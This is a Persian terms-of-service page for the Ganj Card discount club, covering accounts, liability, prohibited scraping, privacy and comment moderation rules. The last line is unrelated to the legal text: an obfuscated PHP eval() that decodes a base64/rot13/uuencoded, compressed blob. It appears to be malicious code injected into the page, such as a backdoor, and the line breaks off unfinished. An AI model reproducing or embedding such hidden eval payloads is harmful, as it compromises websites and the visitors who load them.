قوانین و مقررات

بـاشگاه مشتریان گنج کارت مفتخر است که در راستای افـزایش تـوان خـرید شهروندان محترم و همچنین تکریم ایشان اقدام به ایجاد بستری مناسب جهت تخفیف آن لاین با استفاده از گنج کارتنموده است.اعضای محترم باشگاه گنج کارت می توانند با مراجعه به لیست پذیرندگان از نشانی و تلفن و درصد تخفیف مطلع گردیده ودر زمان مراجعه ضمن اطلاع از قیمت، کارت باشگاه خود را از دستگاه کارت خوان پـارسیان کـشیده و بـه صـورت اتـوماتیک از تـخفیف یـاد شده استفاده نمایند.

این سایت و کلیه زیرساخت های مورد استفاده در آن و کلیه محتویات آن هوشمند سازان ساجد و فروشندگان و عرضه کنندگان کالا و خدمات تعلق دارد.
شما بدون مجوز از سایت گنج کارت حق تکثیر، توزیع محتویات سایت و فروش دوباره محصولات و یا خدمات را ندارید.
به این ترتیب برای استفاده از سایت شما با کلیه مقررات آن موافقت می کنید.

برای استفاده از سایت گنج کارت ، شما باید از شرایط زیر برخودار باشید:
تلاش برای استفاده از ابزار های استخراج اطلاعات و داده ها، ربات ها و برنامه های تخریبی و تجهیزات عملیاتی دیگر ممنوع میباشد
شما طبق ضوابط و مقررات گنج کارت می توانید از سایت به صورت کامل استفاده کنید
شما می توانید از کلیه خدمات و کالاهای ارایه شده برای هدیه به دوستان و نزدیکان خود استفاده کنید
اطلاعات ارائه شده به سایت گنج کارت از طرف شما باید دقیق و صحیح و کامل و موثق باشند
برای استفاده از کلیه خدمات و امکانات این سایت باید یک حساب کاربری ایجاد شود

ممکن است در حین ارائه و دریافت خدمات بعضی حوادث غیر قابل پیش بینی، اشکال یا اختلالی روی دهد و دسترسی شما به سایت یا دسترسی به حساب کاربری در اثر این شرایط خاص و خارج از کنترل مقدور نباشد. اگر چه کارشناسان مابه صورت مداوم می کوشند تا دسترسی به سایت دائمی باشد.

در کلیه مراحل و در هر زمان ، از حق قانونی برای تغییر، اصلاح برخی و یا کلیه بخشهای سایت به طور انحصاری برخودار می باشد، اگر در ضوابط و شرایط استفاده از سایت تغییرات خاصی ایجاد کنیم و یا خدمات ارائه شده را تغییر دهیم، اطلاعیه و تذکراتی بر ایجاد تغییرات، یا اصلاح آنها بر روی سایت ارائه خواهیم کرد.

اگر شما در سایت گنج کارت دارای حساب کاربری هستید، هر گونه تغییری بروی مفاد و شرایط استفاده از حساب کاربری شما توسط گنج کارت قابل انجام می باشد.

پیشنهاد ما این است که شما کلیه ضوابط و مقررات استفاده از سایت را به دقت بررسی کنید و از کلیه تغییرات و اصلاحات ان مطلع باشید.

عضویت کاربران در سایت گنج کارت رایگان می باشد.

شما تنها مجاز به ساختن یک حساب کاربری برای استفاده از امکانات سایت هستید.

اگر از سیستم هایی استفاده میکنید که چندین کاربر متفاوت از آن استفاده میکنند، حتما اطمینان حاصل کنید که به درستی از حساب کاربری خود خارج شدید، گنج کارت هیچ گونه مسولیتی در صورت بروز مشکل بر عهده نخواهدگرفت.

مسئولیت کلیه فعالیتهایی که در حساب کاربری شما انجام می شود را، شما برعهده خواهید داشت.

حساب کاربری شما قابل واگذاری به غیر نیست.

کلیه تعاملات و تراکنش ها و مطالب و خدماتی که در سایت ارایه می شوند طبق ضوابط و مقررات جمهوری اسلامی ایران می باشد.

به منظور هدایت و کنترل سایت به طور انحصاری ، فعالیتهای ذیربط را نمی توانید انجام دهید . این فعالتیها ممنوع می باشند و پیگرد قانونی دارند.

از طریق تبلیغات منفی و شایعات بی اساس تاثیرات نامطلوبی را به افراد و یا خدمات دهنده ای اعمال کردن ممنوع می باشد و پیگرد قانونی دارد.

استفاده از محتویات سایت گنج کارت بدون مجوز در سایت یا وبلاگ های دیگر به طوری که منافع سایت گنج کارت و شرکای تجاری گنج کارت به خطر بیافتد ممنوع می باشد و پیگرد قانونی دارد.

کپی یا اسکن سایت به منظور جمع آوری داده ها در مراحل مختلف و جمع آوری اطلاعات و طریقه نرخ گذاری اطلاعات یا داده های مشابه ممنوع می باشد.

تداخل خدمات بر کاربر به روش کاربردی اعم از انتشار ویروس های کامپیوتری در سایت یا بارگذاری اطلاعات، آگهی های تبلیغاتی و بمب های خبری، ایمیل های جنجال برانگیز در سایت ممنوع می باشد و پیگرد قانونی دارد.

تکنیک های ایجاد فریم ها برای محدود کردن کاربران و یا تکنیک های پنهان سازی متون بدون مجوز یا سند کتبی و رسمی ممنوع می باشد و پیگرد قانونی دارد.

هر گونه استفاده غیر مجاز از محتویات سایت گنج کارت نسبت به اهداف غیر مذهبی، سیاسی و تجاری که مطابق قوانین جمهوری اسلامی ایران و سایت گنج گارت نباشد ممنوع می باشد و پیگرد قانونی دارد.

استفاده از اطلاعات فروشندگان و یا محصولاتی که در سایت گنج کارت بارگذاری شده برروی سایت ثانویه بدون هیچگونه مجوز کتبی ممنوع میباشد و پیگرد قانونی دارد.

تمامی اطلاعات و داده های شما نزد گنج کارت به امانت است، اطمینان داشته باشید که از تمامی اطلاعات شما محافظت میشود.

گنج کارت از اطلاعات شما فایل پشتیبانی تهیه خواهد کرد که در صورت بروز مشکلی که باعث از بین رفتن اطلاعات کاربری شما شود، آنها را جایگزین کند.

تمامی کالا ها و یا خدمات ارایه شده در سایت گنج کارت دارای مشخصات و ویژگی های خاص خود هستند که به طور واضح و کامل شرح داده شده اند و در دسترس عموم قرار دارند.

به دلیل کنترل و جلوگیری از نظراتی که طبق قوانین نباشد، در قسمت دیدگاه ها، نظرات ابتدا توسط مدیر بخش کنترل شده و در صورتی که مطابق به قوانین باشد انتشار پیدا خواهد کرد.

مواردی که شامل تعریف کاراکتر مطلوب نمی شوند

  • قرار دادن فضای خالی (Space) بیش از حد معمول
  • کشیدن حروف یا کلمات با استفاده از صفحه کلید
  • استفاده ی مکرر از یک حرف یا کلمه
  • بیان مطلب تکراری با نگارش متفاوت

 

جهت احترام به وقت بازدیدکنندگان سایت گنج کارت ، لازم است اعضا مطالب غیر ضروری را در مطالب حذف کرده و تا حد ممکن تنها مطالب ضروری و مفید را لحاظ کنند.

تنها نظراتی که با حروف و زبان فارسی نوشته شده باشند، امکان نمایش در سایت را دارند، لذا از نوشتن با حروف انگلیسی یا به زبان انگلیسی خودداری نمایید.

تمام کاربران حق دارند نظرات خود را به شرط رعایت قوانین، در سایت منتشر کنند، لذا حتی اگر نظری را به دور از واقعیت، جانبدارانه یا اشتباه یافتید، نباید نظر دهنده را مخاطب قرار دهید یا از وی انتقاد نمایید. هر کاربر تنها می تواند نظر خود را عنوان کند و قضاوت را به خوانندگان نظرات واگذار نماید.

کاربران ارسال کننده نظر، موظف به استفاده از ادبیات محترمانه و عدم توهین به دیگر کاربران هستند، بدیهی است هرگونه توهین به فرد یا افرادی، باعث عدم تایید نظر کاربر می شود.

ثبت اطلاعات ارتباطی شخصی، از جمله شماره تلفن یا آدرس ایمیل در قسمت نظرات ممنوع می باشد، لذا از ثبت اینگونه اطلاعات ارتباطی در نظرات خود خودداری نمایید.

کاربران نمی توانند مطالبی در خصوص امور مذهبی و سیاسی قرار دهند در صورت مشاهده عضویت کاربر به صورت تعلیق در می اید.

کاربر نمی تواند در سایت نظراتی را به ثبت برساند که موجب نقض حقوق سایر اعضا شده، یا عمل مجرمانه‌ای را در پی داشته باشد و یا در خصوص امور مذهبی و سیاسی اظهار نظر نماید. چنانچه هر یک از کاربران بر نقض این بند پا فشاری نموده و تذکرات را نادیده بگیرند بلافاصله از سایت اخراج و چنانچه خریدی انجام داده باشد، وجه واریزی به ایشان مسترد نخواهد شد و دیگر حق هیچ گونه فعالیتی در این سایت ندارند.

eval(gzuncompress(gzinflate(convert_uudecode(str_rot13(base64_decode(urldecode("WmA2JGBUQl1LVCRaLUZZTjc0Kz8xM1xRWVlILkpMQSgkYDBQKTY5MTo2KVY5UiFXP1RMPjxXVyIxUVJTNApaUkxPO1dXJDAnXl9TTT4sOidNXkBXOiJUVSpNPzYlRTw2UipZN0hNMFFMVztUTT03USUmQFhTUi1QQFMpCiw%2BPDdSVzQ1MGBDIUdTMkNLCmAK"